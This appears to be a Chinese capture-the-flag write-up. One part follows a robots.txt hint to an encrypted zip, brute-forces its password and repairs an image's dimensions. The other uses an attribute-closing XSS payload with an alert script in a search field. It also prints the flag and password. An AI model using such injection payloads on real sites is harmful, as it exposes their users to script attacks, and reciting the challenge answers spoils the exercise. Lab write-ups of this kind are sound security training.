./robot/index.html
打开网址显示
我最讨厌spider!!!
spider爬虫
很多网站中都会设置robots.txt文件,用来规范、约束或者是禁止爬虫对于网站中数据的采集等操作。robots.txt文件用于禁止网络爬虫访问网站指定目录
./robot/robots.txt
打开显示
sir,this way!!!
f1a9.zip
tip: winrar Yes!!!
访问./robot/f1a9.zip
下载zip文件
zip文件加密了,tip:winrar Yes!!!
提示用WinRAR打开
打开后看到注释显示密码:??????338
一个6位数加上338共九位
暴力破解
flag{th1s_1s_crc_crack}
密码:860834338
解压后是一张图片,左上角有网易云logo,长和宽是:798px X 733px
联想到音乐封面图应该是正方形,用010修改为798x798
./xss/index.php
打开是关于xss的,
相关->标签闭合绕过
搜索框输入aaaaa,Dom结构如下
<form action="index.php" method="GET">
<input name="keyword" value="aaaaaa">
<input type="submit" name="submit" value="搜索">
</form>
前面是 value="
后面是">
输入"><p>test</p>
闭合input标签插入段落,显示如下
<form action="index.php" method="GET">
<input name="keyword" value="">
<p>test</p>
">
<input type="submit" name="submit" value="搜索">
</form>
p标签被解析
提示要弹框算成功,输入"><script>alert("q")</script>